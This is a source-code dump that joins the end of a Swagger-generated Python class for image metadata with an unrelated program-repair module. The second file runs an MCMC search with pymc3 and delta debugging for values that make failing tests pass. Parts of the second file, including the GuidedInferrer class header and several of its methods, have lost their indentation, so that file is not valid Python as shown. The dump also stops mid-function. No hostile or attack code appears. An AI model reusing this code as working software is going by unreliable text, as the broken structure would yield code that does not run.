        'time': 'datetime',
        'height': 'int',
        'width': 'int',
        'mpp': 'float',
        'objective_power': 'float',
        'image_type': 'int',
        'image_set': 'int',
        'annotations': 'list[int]'
    }
    attribute_map = {
        'id': 'id',
        'name': 'name',
        'filename': 'filename',
        'time': 'time',
        'height': 'height',
        'width': 'width',
        'mpp': 'mpp',
        'objective_power': 'objectivePower',
        'image_type': 'image_type',
        'image_set': 'image_set',
        'annotations': 'annotations'
    }
    def __init__(self, id=None, name=None, filename=None, time=None, height=None, width=None, mpp=None, objective_power=None, image_type=None, image_set=None, annotations=None):  # noqa: E501
        """Image - a model defined in Swagger"""  # noqa: E501
        self._id = None
        self._name = None
        self._filename = None
        self._time = None
        self._height = None
        self._width = None
        self._mpp = None
        self._objective_power = None
        self._image_type = None
        self._image_set = None
        self._annotations = None
        self.discriminator = None
        if id is not None:
            self.id = id
        # name/filename are assigned unconditionally: their setters reject None
        self.name = name
        self.filename = filename
        if time is not None:
            self.time = time
        if height is not None:
            self.height = height
        if width is not None:
            self.width = width
        if mpp is not None:
            self.mpp = mpp
        if objective_power is not None:
            self.objective_power = objective_power
        if image_type is not None:
            self.image_type = image_type
        # image_set/annotations setters substitute a placeholder string for None
        self.image_set = image_set
        self.annotations = annotations
    @property
    def id(self):
        """Gets the id of this Image. # noqa: E501
        :return: The id of this Image. # noqa: E501
        :rtype: int
        """
        return self._id
    @id.setter
    def id(self, id):
        """Sets the id of this Image.
        :param id: The id of this Image. # noqa: E501
        :type: int
        """
        self._id = id
    @property
    def name(self):
        """Gets the name of this Image. # noqa: E501
        :return: The name of this Image. # noqa: E501
        :rtype: str
        """
        return self._name
    @name.setter
    def name(self, name):
        """Sets the name of this Image.
        :param name: The name of this Image. # noqa: E501
        :type: str
        """
        if name is None:
            raise ValueError("Invalid value for `name`, must not be `None`")  # noqa: E501
        self._name = name
    @property
    def filename(self):
        """Gets the filename of this Image. # noqa: E501
        :return: The filename of this Image. # noqa: E501
        :rtype: str
        """
        return self._filename
    @filename.setter
    def filename(self, filename):
        """Sets the filename of this Image.
        :param filename: The filename of this Image. # noqa: E501
        :type: str
        """
        if filename is None:
            raise ValueError("Invalid value for `filename`, must not be `None`")  # noqa: E501
        self._filename = filename
    @property
    def time(self):
        """Gets the time of this Image. # noqa: E501
        :return: The time of this Image. # noqa: E501
        :rtype: datetime
        """
        return self._time
    @time.setter
    def time(self, time):
        """Sets the time of this Image.
        :param time: The time of this Image. # noqa: E501
        :type: datetime
        """
        self._time = time
    @property
    def height(self):
        """Gets the height of this Image. # noqa: E501
        :return: The height of this Image. # noqa: E501
        :rtype: int
        """
        return self._height
    @height.setter
    def height(self, height):
        """Sets the height of this Image.
        :param height: The height of this Image. # noqa: E501
        :type: int
        """
        self._height = height
    @property
    def width(self):
        """Gets the width of this Image. # noqa: E501
        :return: The width of this Image. # noqa: E501
        :rtype: int
        """
        return self._width
    @width.setter
    def width(self, width):
        """Sets the width of this Image.
        :param width: The width of this Image. # noqa: E501
        :type: int
        """
        self._width = width
    @property
    def mpp(self):
        """Gets the mpp of this Image. # noqa: E501
        :return: The mpp of this Image. # noqa: E501
        :rtype: float
        """
        return self._mpp
    @mpp.setter
    def mpp(self, mpp):
        """Sets the mpp of this Image.
        :param mpp: The mpp of this Image. # noqa: E501
        :type: float
        """
        self._mpp = mpp
    @property
    def objective_power(self):
        """Gets the objective_power of this Image. # noqa: E501
        :return: The objective_power of this Image. # noqa: E501
        :rtype: float
        """
        return self._objective_power
    @objective_power.setter
    def objective_power(self, objective_power):
        """Sets the objective_power of this Image.
        :param objective_power: The objective_power of this Image. # noqa: E501
        :type: float
        """
        self._objective_power = objective_power
    @property
    def image_type(self):
        """Gets the image_type of this Image. # noqa: E501
        :return: The image_type of this Image. # noqa: E501
        :rtype: int
        """
        return self._image_type
    @image_type.setter
    def image_type(self, image_type):
        """Sets the image_type of this Image.
        :param image_type: The image_type of this Image. # noqa: E501
        :type: int
        """
        self._image_type = image_type
    @property
    def image_set(self):
        """Gets the image_set of this Image. # noqa: E501
        :return: The image_set of this Image. # noqa: E501
        :rtype: int
        """
        return self._image_set
    @image_set.setter
    def image_set(self, image_set):
        """Sets the image_set of this Image.
        :param image_set: The image_set of this Image. # noqa: E501
        :type: int
        """
        # Deliberate deviation from generated code: a None value (field
        # omitted server-side) is replaced by an explanatory placeholder
        # string instead of raising.
        if image_set is None:
            image_set = "image_set not load please remove omit=image_set"
        #if image_set is None:
        #    raise ValueError("Invalid value for `image_set`, must not be `None`")  # noqa: E501
        self._image_set = image_set
    @property
    def annotations(self):
        """Gets the annotations of this Image. # noqa: E501
        :return: The annotations of this Image. # noqa: E501
        :rtype: list[int]
        """
        return self._annotations
    @annotations.setter
    def annotations(self, annotations):
        """Sets the annotations of this Image.
        :param annotations: The annotations of this Image. # noqa: E501
        :type: list[int]
        """
        # Deliberate deviation from generated code: placeholder instead of raise.
        if annotations is None:
            annotations = "Annotations not load please remove omit=annotations"
        # raise ValueError("Invalid value for `annotations`, must not be `None`")  # noqa: E501
        self._annotations = annotations
    def to_dict(self):
        """Returns the model properties as a dict"""
        result = {}
        for attr, _ in six.iteritems(self.swagger_types):
            value = getattr(self, attr)
            if isinstance(value, list):
                result[attr] = list(map(
                    lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
                    value
                ))
            elif hasattr(value, "to_dict"):
                result[attr] = value.to_dict()
            elif isinstance(value, dict):
                result[attr] = dict(map(
                    lambda item: (item[0], item[1].to_dict())
                    if hasattr(item[1], "to_dict") else item,
                    value.items()
                ))
            else:
                result[attr] = value
        if issubclass(Image, dict):
            for key, value in self.items():
                result[key] = value
        return result
    def to_str(self):
        """Returns the string representation of the model"""
        return pprint.pformat(self.to_dict())
    def __repr__(self):
        """For `print` and `pprint`"""
        return self.to_str()
    def __eq__(self, other):
        """Returns true if both objects are equal"""
        if not isinstance(other, Image):
            return False
        return self.__dict__ == other.__dict__
    def __ne__(self, other):
        """Returns true if both objects are not equal"""
        return not self == other
# ---
# src/repair/guided_inference.py
import logging
import numpy as np
import scipy as sc
import pymc3 as pm
import os
from symbolic_inference import SymbolicInferrer
from os.path import join
from os import mkdir
import time
import statistics
import json
import subprocess
from runtime import Trace, TraceItem
from functools import reduce
from DD import DD
from bin_utils import Bin
from utils import DefectClass as DC
from utils import TraceInfo as TI
from z3 import Select, Concat, Array, BitVecSort, BitVecVal, Solver, BitVec
from typing import List, Tuple, Dict
from enum import Enum
from custom_types import Block, Sample, BitSeq, Proposal, \
Ebits, EBitsSeq, BlockEbits, Cost, Location, Loc, TestOut, \
Angel, AngelicPath, TraceFile
logger = logging.getLogger('guided_infer')
pymc3_logger = logging.getLogger('pymc3')
class ExtractionFailure(Exception):
    """Signals that extraction of an initial sample failed (see
    GuidedInferrer.init_sample, which falls back to a default sample)."""
class LocDDFailure(Exception):
    """Raised when location-level delta debugging fails or is skipped.

    The original definition carried a no-op zero-argument ``__init__``;
    it is removed because ``Exception`` already supports the bare
    ``raise LocDDFailure`` / ``LocDDFailure()`` uses in this module.
    """
class EbitsDDFailure(Exception):
    """Raised when ebits-level delta debugging fails.

    Carries the minimal location set and minimal initial ebits discovered
    before the failure so the caller can still derive angelic paths.
    """
    def __init__(self, min_locs, min_init_ebits):
        # minimal failing configuration found before the DD failure
        self.min_init_ebits = min_init_ebits
        self.min_locs = min_locs
class AngelicValsFound(pm.StopSampling):
    """Stop-sampling signal: a passing (angelic) trace was found.

    Carries the trace file of the passing run plus the sampling statistics
    accumulated so far.
    """
    def __init__(self, trace_file, unique_trial, total_trial,
                 cost_seq, ratio_seq, accepted_seq):
        self.trace_file = trace_file
        # trial counters
        self.total_trial = total_trial
        self.unique_trial = unique_trial
        # per-trial diagnostic sequences
        self.cost_seq = cost_seq
        self.accepted_seq = accepted_seq
        self.ratio_seq = ratio_seq
class SampleSpaceExhausted(pm.StopSampling):
    """Stop-sampling signal: every point of the sample space was visited."""
    def __init__(self, sample_space_size, samples, unique_trial, total_trial,
                 cost_seq, ratio_seq, accepted_seq):
        self.sample_space_size = sample_space_size
        self.samples = samples
        # trial counters
        self.total_trial = total_trial
        self.unique_trial = unique_trial
        # per-trial diagnostic sequences
        self.cost_seq = cost_seq
        self.accepted_seq = accepted_seq
        self.ratio_seq = ratio_seq
class Stuck(pm.StopSampling):
    """Stop-sampling signal: the cost stayed (nearly) constant for too many
    consecutive iterations."""
    def __init__(self, cost, unique_trial, total_trial,
                 cost_seq, ratio_seq, accepted_seq):
        self.cost = cost
        # trial counters
        self.total_trial = total_trial
        self.unique_trial = unique_trial
        # per-trial diagnostic sequences
        self.cost_seq = cost_seq
        self.accepted_seq = accepted_seq
        self.ratio_seq = ratio_seq
class EbitsOverFlow(pm.StopSampling):
    """Stop-sampling signal: the effective bits grew past the current block
    capacity; sampling must restart in a larger sample space."""
    def __init__(self, ebits, last_sample, unique_trial, total_trial,
                 cost_seq, ratio_seq, accepted_seq):
        self.ebits = ebits
        self.last_sample = last_sample
        # trial counters
        self.total_trial = total_trial
        self.unique_trial = unique_trial
        # per-trial diagnostic sequences
        self.cost_seq = cost_seq
        self.accepted_seq = accepted_seq
        self.ratio_seq = ratio_seq
class TrialsExhausted(pm.StopSampling):
    """Stop-sampling signal: the configured maximum number of trials was
    reached without success."""
    def __init__(self, unique_trial, total_trial,
                 cost_seq, ratio_seq, accepted_seq):
        # trial counters
        self.total_trial = total_trial
        self.unique_trial = unique_trial
        # per-trial diagnostic sequences
        self.cost_seq = cost_seq
        self.accepted_seq = accepted_seq
        self.ratio_seq = ratio_seq
class ChunkOverFlow(Exception):
    """Raised when a value no longer fits its chunk; carries the offending
    number of effective bits."""
    def __init__(self, ebits):
        self.ebits = ebits
class CustomProposal:
    """Proposal distribution for the MCMC search over angelic values.

    The chain state is a flattened vector of bit chunks (one block per
    suspicious location).  A proposal flips either one bit or several bits
    per location, chosen with the configured probabilities.
    """
    def __init__(self, kwargs):
        # NOTE: receives a single dict (not **kwargs); see
        # args_of_proposal_dist built in GuidedInferrer.repair_cond.
        self.project = kwargs['project']
        self.test = kwargs['test']
        self.locations = kwargs['locations']
        self.working_dir = kwargs['working_dir']
        self.searchDir = kwargs['searchDir']
        self.one_bit_flip_prob = kwargs['one_bit_flip_prob']
        self.mul_bits_flip_prob = kwargs['mul_bits_flip_prob']
        self.inferrer = kwargs['inferrer']
        self.config = kwargs['config']
        self.environment = dict(os.environ)
    """
    q0: the current (padded) flattened value
    e.g. if the original sample is [array([0,1]), array([1,0])], then
    q0 becomes array([0, 1, 1, 0])
    return: proposed value
    """
    def __call__(self, q0):
        # logger.debug('[CustomProposal] q0: {}'.format(q0))
        q0 = q0.astype('int64')
        # q0: a flattened 1-d array. This is a concatenation of all chunks.
        # With q0, there is no distinction between locations.
        # e.g., array([ 0, 2046, 0, 0])
        #
        # q0_chunks: q0 is split into arrays where each array represents the bitvector for
        # a distinct location.
        # e.g., [array([ 0, 2046]), array([0, 0])] for 2 locations
        q0_chunks = list(
            self.inferrer.chunks(np.copy(q0),
                                 self.inferrer.chunks_in_block)) if len(q0) > 0 else []
        # q0_chunks should be idential with the original sample
        # logger.debug('q0_chunks: {}'.format(q0_chunks))
        # logger.debug('chunks_in_block: {}'.format(self.inferrer.chunks_in_block))
        self.inferrer.set_q0(q0_chunks)
        # one proposed block per location (propose needs the location index
        # to look up its fault-localization score)
        q = list(map(self.propose,
                     zip(q0_chunks, self.inferrer.cur_ebits_list, range(len(q0_chunks)))))
        return q
    """
    propose a new block for each suspicious location
    """
    def propose(self, args: Tuple[np.ndarray, int, int]) -> np.ndarray:
        chunk_bits = self.inferrer.chunk_bits
        q0_i, bits_i, idx = args
        # Closure over `unpadded`/`bits_i`: number of bits of chunk
        # `chunk_idx` that belong to the value (the top chunk may be partial).
        def modifiable_bits_size(chunk_idx):
            if chunk_bits * (len(unpadded) - chunk_idx) <= bits_i:
                return chunk_bits
            else:
                rst = bits_i % chunk_bits
                assert rst != 0
                return rst
        q0_i = np.copy(q0_i)
        act_chunks_in_block = int(np.ceil(bits_i / chunk_bits))
        assert act_chunks_in_block <= len(q0_i)
        # NOTE: `unpadded` is a numpy view into the copied q0_i, so the
        # in-place bit flips below mutate the copy (not the caller's array).
        unpadded = q0_i[len(q0_i) - act_chunks_in_block:len(q0_i)]
        pad_len = len(q0_i) - len(unpadded)
        if self.config['group_size'] > 1 and \
                self.inferrer.scores[idx] < np.random.rand():
            # As fault location score is lower, we do not change
            # the bits with a higher probability.
            q_i = q0_i
        elif self.choose_maj():
            # flip one bit
            logger.debug('flip 1 bit')
            # NOTE(review): `range` shadows the builtin within this function
            range = np.arange(len(unpadded))
            if len(range) <= 0:
                q_i = q0_i
            else:
                chunk_idx = np.random.choice(range)
                bits_size = modifiable_bits_size(chunk_idx)
                kth = np.random.choice(np.arange(bits_size))
                unpadded[chunk_idx] = self.flip(unpadded[chunk_idx], kth)
                q_i = Bin.pad_zeros(unpadded, pad_len, 0, int)
        else:
            # flip N bits where N >= 0
            range = np.arange(0, bits_i + 1)
            if len(range) <= 0:
                q_i = q0_i
            else:
                num_of_flips = np.random.choice(range)
                logger.debug('flip {} bits'.format(num_of_flips))
                if num_of_flips == 0:
                    q_i = q0_i
                else:
                    # choose distinct (chunk, bit) positions until N bits flipped
                    pos_dict = dict()
                    flipped = 0
                    while flipped < num_of_flips:
                        chunk_idx = np.random.choice(np.arange(len(unpadded)))
                        bits_size = modifiable_bits_size(chunk_idx)
                        kth = np.random.choice(np.arange(bits_size))
                        if (chunk_idx, kth) in pos_dict:
                            continue
                        pos_dict.update({(chunk_idx, kth): True})
                        unpadded[chunk_idx] = self.flip(unpadded[chunk_idx], kth)
                        flipped += 1
                    q_i = Bin.pad_zeros(unpadded, pad_len, 0, int)
        return q_i
    def choose_maj(self):
        # True -> single-bit flip move; False -> multi-bit flip move
        return np.random.choice([True, False], p=[self.one_bit_flip_prob,
                                                  1 - self.one_bit_flip_prob])
    def flip(self, x, pos):
        # toggle bit `pos` of integer x
        return x ^ (1 << pos)
class GuidedInferrer(SymbolicInferrer):
def __init__(self, config, tester, load, searchDir, dd_dir, extracted, working_dir):
super().__init__(config, tester, load, searchDir)
self.dd_dir = dd_dir
self.extracted = extracted
self.working_dir = working_dir
self.one_bit_flip_prob = self.config['one_bit_flip_prob']
self.mul_bits_flip_prob = 1 - self.one_bit_flip_prob
self.beta = self.config['mcmc_beta']
self.max_same_cost_iter = self.config['max_same_cost_iter']
self.chunk_bits = self.config['chunk_bits']
self.max_resample = self.config['max_resample']
self.block_expand_factor = self.config['block_expand_factor']
def init_sample(self, seed: List[Tuple[str, Loc, str]]) -> Tuple[List[np.ndarray], List[int]]:
if seed is None:
try:
init_sample, cur_ebits_list = self.extract_start()
except ExtractionFailure as e:
logger.debug('ExtractionFailure: {}'.format(e))
logger.warn('failed to extract the inital sample (use the default sample).')
chunks_ebits_list = list(zip([np.ones(1, dtype=int)] * len(self.c_locs),
[1] * len(self.c_locs)))
init_sample, cur_ebits_list = self.sample_and_ebits(chunks_ebits_list, init=True)
else:
init_sample, cur_ebits_list = self.sample_and_ebit_seq(seed, init=True)
return init_sample, cur_ebits_list
    def sample(self, init_sample, sample_shape, args_of_proposal_dist):
        """Run the MCMC sampling loop (terminates via pm.StopSampling
        subclasses raised from accept_fun/post_accept_fun).

        NOTE(review): keyword arguments such as accept_fun, proposal_dist
        and allow_empty_model are not part of stock pymc3 — this appears to
        rely on a patched/forked pymc3; confirm the pinned dependency.
        """
        if self.config['step_method'] == 'smc':
            logger.warning('smc is not supported')
            exit(1)
            # NOTE(review): everything below exit(1) in this branch is
            # unreachable dead code, kept as-is.
            pm.DiscreteUniform('p', 0, 1, shape=sample_shape)
            pm.sample(draws=3,
                      tune=0,
                      compute_convergence_checks=False,
                      cores=1, chains=1,
                      start={'p': init_sample},
                      progressbar=False,
                      logger=pymc3_logger,
                      allow_empty_model=True,
                      step=pm.SMC(likelihood_logp=self.likelihood_logp,
                                  accept_fun=self.accept_fun,
                                  post_accept_fun=self.post_accept_fun,
                                  # S=mc,
                                  proposal_dist=CustomProposal,
                                  random_walk_mc=True,
                                  args_of_proposal_dist=args_of_proposal_dist))
        else:
            # The following dist is given only to trigger sampling.
            # The actual sampling is performed through CustomProposal.
            pm.DiscreteUniform('p', 0, 1, shape=sample_shape)
            pm.sample(self.search_max_trials * 50, tune=0,
                      compute_convergence_checks=False,
                      cores=1, chains=1,
                      start={'p': init_sample},
                      progressbar=False,
                      logger=pymc3_logger,
                      allow_empty_model=True,
                      step=pm.Metropolis(accept_fun=self.accept_fun,
                                         post_accept_fun=self.post_accept_fun,
                                         # S=mc,
                                         proposal_dist=CustomProposal,
                                         random_walk_mc=True,
                                         args_of_proposal_dist=args_of_proposal_dist))
def get_proposal_file(self, seed, file_name):
proposal_dir = self.get_proposal_dir()
proposal_file = join(proposal_dir, file_name + '.json')
proposal_dict = dict()
for c_loc in self.c_locs:
key = reduce((lambda x, y: '{}-{}'.format(x, y)), c_loc)
vals = [int(TraceItem.get_value(x)) for x in seed]
proposal_dict[key] = vals
with open(proposal_file, 'w') as file:
file.write(json.dumps(proposal_dict))
return proposal_file
    def repair_cond(self, seed, project, test, locations):
        """Search for angelic paths for conditional locations via MCMC.

        Repeatedly runs the sampling loop; each pm.StopSampling subclass
        encodes one termination reason.  On success, delta debugging tries
        to minimize the found sample.  Statistics for the iteration are
        recorded before returning.

        Returns
        -------
        (angelic_paths, ap_trace_file)
        """
        angelic_paths = []
        ap_trace_file = None
        repeat = 0
        explored = 0
        sampled = 0
        cost_seq = []
        ratio_seq = []
        accepted_seq = []
        dd_elapsed = 0
        # termination-reason flags (reported in iter_stat below)
        angelic_found = False
        sample_space_exhausted = False
        stuck = False
        trials_exhuasted = False
        ebits_overflown = False
        loc_dd_failed = False
        ebits_dd_failed = False
        args_of_proposal_dist = {'project': project,
                                 'test': test,
                                 'locations': locations,
                                 'working_dir': self.working_dir,
                                 'searchDir': self.searchDir,
                                 'one_bit_flip_prob': self.one_bit_flip_prob,
                                 'mul_bits_flip_prob': self.mul_bits_flip_prob,
                                 'inferrer': self,
                                 'config': self.config}
        logger.debug('seed: {}'.format(seed))
        if len(seed) == 0:
            logger.debug('skip for an empty seed')
            return angelic_paths, ap_trace_file
        init_sample, self.cur_ebits_list = self.init_sample(seed)
        sample_shape = np.shape(init_sample)
        logger.info('init sample: {}'.format(init_sample))
        inference_start_time = time.time()
        # Each EbitsOverFlow restarts sampling in a larger sample space,
        # up to max_resample times; all other outcomes break out.
        while repeat < self.max_resample:
            with pm.Model() as model:
                try:
                    self.sample(init_sample, sample_shape, args_of_proposal_dist)
                    # trace.report._run_convergence_checks(trace, model)
                    break
                except AngelicValsFound as e:
                    angelic_found = True
                    logger.info('found an angelic path for test \'{}\''.format(test))
                    logger.debug('trace_file: {}'.format(e.trace_file))
                    dd_start_time = time.time()
                    seed = Trace.parse_trace_file(e.trace_file)
                    angelic_sample_and_ebit_seq: Tuple[Sample, EBitsSeq] = \
                        self.sample_and_ebit_seq(seed, allow_expand=True)
                    try:
                        # Delta debugging is skipped when configured or when
                        # the angelic sample equals the initial one.
                        if self.config['skip_dd']:
                            raise LocDDFailure
                        seq1 = angelic_sample_and_ebit_seq
                        seq2 = self.init_sample_and_ebit_seq
                        if np.array_equal(seq1[0], seq2[0]) and seq1[1] == seq2[1]:
                            raise LocDDFailure
                        refine = AngelicForestRefine(self, self.project, test, self.environment,
                                                     self.dd_dir, self.locations, self.c_locs,
                                                     self.run_test)
                        angelic_paths, ap_trace_file = refine(angelic_sample_and_ebit_seq,
                                                              self.init_sample_and_ebit_seq,
                                                              e.trace_file)
                    except LocDDFailure:
                        # fall back to the unminimized trace
                        ap_trace_file = e.trace_file
                        angelic_paths = self.get_angelic_paths(ap_trace_file,
                                                               self.c_locs,
                                                               angelic_sample_and_ebit_seq[1])
                        loc_dd_failed = True
                    except EbitsDDFailure as ddf:
                        ap_trace_file = e.trace_file
                        angelic_paths = self.get_angelic_paths(ap_trace_file,
                                                               ddf.min_locs, ddf.min_init_ebits)
                        ebits_dd_failed = True
                    explored += e.unique_trial
                    sampled += e.total_trial
                    cost_seq.extend(e.cost_seq)
                    ratio_seq.extend(e.ratio_seq)
                    accepted_seq.extend(e.accepted_seq)
                    dd_end_time = time.time()
                    dd_elapsed += dd_end_time - dd_start_time
                    break
                except SampleSpaceExhausted as e:
                    logger.info('Sample space exhausted: size={}, samples={}'.
                                format(e.sample_space_size, e.samples))
                    explored += e.unique_trial
                    sampled += e.total_trial
                    cost_seq.extend(e.cost_seq)
                    ratio_seq.extend(e.ratio_seq)
                    accepted_seq.extend(e.accepted_seq)
                    sample_space_exhausted = True
                    break
                except Stuck as e:
                    logger.info('Stuck in the same cost: {}'.format(e.cost))
                    explored += e.unique_trial
                    sampled += e.total_trial
                    cost_seq.extend(e.cost_seq)
                    ratio_seq.extend(e.ratio_seq)
                    accepted_seq.extend(e.accepted_seq)
                    stuck = True
                    break
                except TrialsExhausted as e:
                    logger.info('All {} trials are exhausted'.format(self.search_max_trials))
                    explored += e.unique_trial
                    sampled += e.total_trial
                    cost_seq.extend(e.cost_seq)
                    ratio_seq.extend(e.ratio_seq)
                    accepted_seq.extend(e.accepted_seq)
                    trials_exhuasted = True
                    break
                except EbitsOverFlow as e:
                    logger.info('Ebits {} is too large'.format(e.ebits))
                    # adjust sampe_shape
                    new_chunks_in_block = \
                        int(np.ceil(e.ebits / self.chunk_bits)) * self.block_expand_factor
                    sample_shape = (sample_shape[0], new_chunks_in_block)
                    # adjust self.chunks_in_block
                    self.init_chunks_in_block(new_chunks_in_block)
                    # adjust init_sample
                    init_sample = [self.pad_chunk(chunk) for chunk in e.last_sample]
                    logger.info('Restart sampling in a larger sample space')
                    logger.info('start vals: {}'.format(init_sample))
                    logger.info('sample shape: {}'.format(sample_shape))
                    explored += e.unique_trial
                    sampled += e.total_trial
                    cost_seq.extend(e.cost_seq)
                    ratio_seq.extend(e.ratio_seq)
                    accepted_seq.extend(e.accepted_seq)
                    ebits_overflown = True
                    repeat += 1
                    continue
        inference_end_time = time.time()
        inference_elapsed = inference_end_time - inference_start_time
        statistics.data['time']['inference'] += inference_elapsed
        statistics.data['time']['dd'] += dd_elapsed
        # per-iteration statistics record
        iter_stat = dict()
        iter_stat['locations'] = locations
        iter_stat['test'] = test
        iter_stat['time'] = dict()
        iter_stat['time']['mcmc'] = inference_elapsed - dd_elapsed
        iter_stat['time']['dd'] = dd_elapsed
        iter_stat['paths'] = dict()
        iter_stat['paths']['explored'] = explored
        iter_stat['paths']['sampled'] = sampled
        iter_stat['paths']['angelic_found'] = angelic_found
        iter_stat['paths']['angelic'] = len(angelic_paths)
        iter_stat['paths']['sample_space_exhausted'] = sample_space_exhausted
        iter_stat['paths']['trials_exhuasted'] = trials_exhuasted
        iter_stat['paths']['ebits_overflown'] = ebits_overflown
        iter_stat['paths']['loc_dd_failed'] = loc_dd_failed
        iter_stat['paths']['ebits_dd_failed'] = ebits_dd_failed
        iter_stat['paths']['stuck'] = stuck
        iter_stat['paths']['cost'] = cost_seq
        iter_stat['paths']['ratio'] = ratio_seq
        iter_stat['paths']['accepted'] = accepted_seq
        statistics.data['iterations']['guided'].append(iter_stat)
        statistics.save()
        return angelic_paths, ap_trace_file
    # @profile
    def __call__(self, project, test, locations, dump, score_dict,
                 seed: TraceFile = None, ptr_seed=None) -> Tuple[List[AngelicPath], TraceFile]:
        """Infer a specification (angelic paths) for `test` via guided search.

        Classifies the suspicious locations into conditional, RHS and
        pointer locations, resets the per-call search state, then delegates
        to the matching repair routine.

        Returns
        -------
        (angelic_paths, ap_trace_file)
        """
        logger.info('inferring specification for test \'{}\' through guided search'.format(test))
        self.project = project
        self.test = test
        self.dump = dump
        self.score_dict = score_dict
        self.locations = sorted(locations)
        # cond locs
        self.c_locs = [TraceItem.get_location(x) for x in self.locations
                       if DC.is_loop_cond(x[0]) or DC.is_if_cond(x[0])]
        # rhs locs
        self.rhs_locs = [TraceItem.get_location(x) for x in self.locations
                        if DC.is_rhs(x[0])]
        # ptr locs
        self.ptr_locs = [TraceItem.get_location(x) for x in self.locations
                         if DC.is_pointer(x[0])]
        # fault localization scores
        self.scores = [score_dict[loc] for loc in self.locations]
        self.environment = dict(os.environ)
        # reset mutable per-call search state
        self.cost_dict = dict()
        self.cur_ebits_list = []
        self.same_cost_count = 0
        self.trial_num = 0
        self.is_first_trial = True
        self.unique_trial = 0
        self.max_sample_space_size = 0
        self.cost_seq = []
        self.accepted_seq = []
        self.ratio_seq = []
        self.search_max_trials = self.config['search_max_trials']
        # Local imports avoid a module-level import cycle with the
        # specialized inferrers.
        if len(self.rhs_locs) > 0:
            from klee_inference import KleeInferrer
            rhs_inferrer = KleeInferrer(self)
            rhs_inferrer.init_suspicious_rhses()
            angelic_paths, ap_trace_file = rhs_inferrer.repair_rhs(project, test, dump,
                                                                   locations)
        elif len(self.ptr_locs) > 0:
            from ptr_inference import PtrInferrer
            ptr_inferrer = PtrInferrer(self)
            angelic_paths, ap_trace_file = ptr_inferrer.repair_ptr(ptr_seed, project,
                                                                   test, locations)
        else:
            angelic_paths, ap_trace_file = self.repair_cond(seed, project, test, locations)
        return angelic_paths, ap_trace_file
def check_sample_space(self):
# logger.debug('cur_ebits_list: {}'.format(self.cur_ebits_list))
sample_space_size = reduce(lambda x, y: x * y,
[2**bits for bits in self.cur_ebits_list])
if sample_space_size > self.max_sample_space_size:
self.max_sample_space_size = sample_space_size
keys = self.cost_dict.keys()
matches = [key for key in keys if list(map(len, key)) == self.cur_ebits_list]
return self.max_sample_space_size, matches, len(matches) / self.max_sample_space_size
    '''
    run the program with qs
    and returns an acceptance ratio
    '''
    def accept_fun(self, qs, q0s):
        """Metropolis-Hastings acceptance: evaluate the cost of the proposed
        sample `qs` against the current sample and return a log acceptance
        ratio; raises pm.StopSampling subclasses to terminate the search.
        """
        self.trial_num += 1
        logger.info('trial #{}'.format(self.trial_num))
        if len(qs) > 0:
            sample_space_size, samples, usage_rate = self.check_sample_space()
            cur_sample_size = len(samples)
            logger.info('used {}% of sample space'.format(100 * usage_rate))
            if cur_sample_size >= sample_space_size:
                logger.debug('cur_sample_size: {}'.format(cur_sample_size))
                logger.debug('sample_space_size: {}'.format(sample_space_size))
                logger.debug('samples: {}'.format(samples))
                raise SampleSpaceExhausted(sample_space_size, samples,
                                           self.unique_trial, self.trial_num,
                                           self.cost_seq, self.ratio_seq, self.accepted_seq)
        try:
            # replace q0s with the per-location chunk view saved by
            # CustomProposal (see set_q0); keep the old ebits for rollback
            q0s = self.q0
            self.old_ebits_list = self.cur_ebits_list.copy()
            # logger.debug('[accept_fun] q0s: {} / {} / {}'.format(q0s, self.cur_ebits_list,
            #                                                      np.shape(q0s)))
            # logger.debug('[accept_fun] qs: {} / {} / {}'.format(qs, self.cur_ebits_list,
            #                                                     np.shape(qs)))
            old_cost, _, _ = self.cost(q0s)
            new_cost, new_qs, is_cached_cost = self.cost(qs)
            # logger.debug('new qs: {} / {} / {}'.format(new_qs,
            #                                            self.cur_ebits_list, np.shape(new_qs)))
            self.cost_seq.append(new_cost)
        except ChunkOverFlow as cof:
            raise EbitsOverFlow(cof.ebits, q0s, self.unique_trial, self.trial_num,
                                self.cost_seq, self.ratio_seq, self.accepted_seq)
        # update qs
        for i in range(len(qs)):
            qs[i] = new_qs[i]
        # logger.info('updated qs: {} / {} / {}'.format(qs, self.cur_ebits_list, np.shape(qs)))
        for ebits in self.cur_ebits_list:
            if ebits > np.shape(qs)[1] * self.chunk_bits:
                raise EbitsOverFlow(ebits, q0s, self.unique_trial, self.trial_num,
                                    self.cost_seq, self.ratio_seq, self.accepted_seq)
        if old_cost is None:
            # no baseline: accept unconditionally
            log_ratio = 0
        elif new_cost is None:
            log_ratio = np.log(0.5)
        else:
            if not is_cached_cost and abs(old_cost - new_cost) < self.config['epsilon']:
                if not self.config['always_accept']:
                    if self.same_cost_count >= self.max_same_cost_iter:
                        raise Stuck(new_cost, self.unique_trial, self.trial_num,
                                    self.cost_seq, self.ratio_seq, self.accepted_seq)
                    self.same_cost_count += 1
            log_ratio = -self.beta * (new_cost - old_cost)
            # Hastings correction when the effective bit widths changed:
            # the proposal is then asymmetric between the two states.
            log_p_old_to_new = 0
            log_p_new_to_old = 0
            if self.old_ebits_list != self.cur_ebits_list:
                logger.debug('old ebits list: {}'.format(self.old_ebits_list))
                logger.debug('new ebtis list: {}'.format(self.cur_ebits_list))
            for i in range(len(self.cur_ebits_list)):
                old_chunks = q0s[i]
                old_bits = self.old_ebits_list[i]
                new_chunks = qs[i]
                new_bits = self.cur_ebits_list[i]
                if old_bits == new_bits:
                    continue
                else:
                    prob_new_to_old = self.prob_of_transfer(np.copy(new_chunks), new_bits,
                                                            np.copy(old_chunks), old_bits)
                    prob_old_to_new = self.prob_of_transfer(np.copy(old_chunks), old_bits,
                                                            np.copy(new_chunks), new_bits)
                    log_p_new_to_old += prob_new_to_old
                    log_p_old_to_new += prob_old_to_new
            if log_p_old_to_new != log_p_new_to_old:
                log_ratio = log_ratio + log_p_new_to_old - log_p_old_to_new
        # NOTE(review): the lines below read cur_sample_size and
        # sample_space_size, which are only bound when len(qs) > 0 above —
        # confirm qs is never empty on this path.
        log_ratio = np.minimum(0, log_ratio)
        logger.info('old cost: {}'.format(old_cost))
        logger.info('new cost: {}'.format(new_cost))
        logger.info('all costs: {}'.format(sorted(set(self.cost_dict.values()))))
        logger.info('accept ratio: {}'.format(np.exp(log_ratio)))
        self.ratio_seq.append(np.exp(log_ratio))
        if cur_sample_size == sample_space_size - 1:
            log_ratio = 0
        if self.config['always_accept']:
            # no more choice to make. we do not want to be stuck.
